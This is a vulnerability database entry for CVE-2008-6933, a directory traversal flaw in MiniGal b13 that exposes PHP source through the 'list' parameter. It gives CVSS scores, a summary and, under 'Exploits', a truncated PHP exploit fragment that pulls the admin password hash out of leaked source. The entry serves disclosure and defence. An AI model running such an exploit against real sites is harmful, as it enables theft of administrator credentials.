5
CVSSv2

CVE-2008-6933

Published: 11/08/2009 Updated: 29/09/2017
CVSS v2 Base Score: 5 | Impact Score: 2.9 | Exploitability Score: 10
VMScore: 505
Vector: AV:N/AC:L/Au:N/C:P/I:N/A:N

Vulnerability Summary

Directory traversal vulnerability in index.php in MiniGal b13 (aka MG2) allows remote malicious users to read the source code of .php files, and possibly the content of other files, via a .. (dot dot) in the list parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

minigal minigal b13

Exploits

<?php set_time_limit(0); function find_pass($data){ $pass = explode('$adminpass = "',$data); if($pass[1]!=""){ echo("Vuln exploited enjoy !\n"); sleep(1); echo("Admin hash == ["substr($pass[1],0,32)"]\n"); } else{ echo("Exploit failed!!!!"); } } ...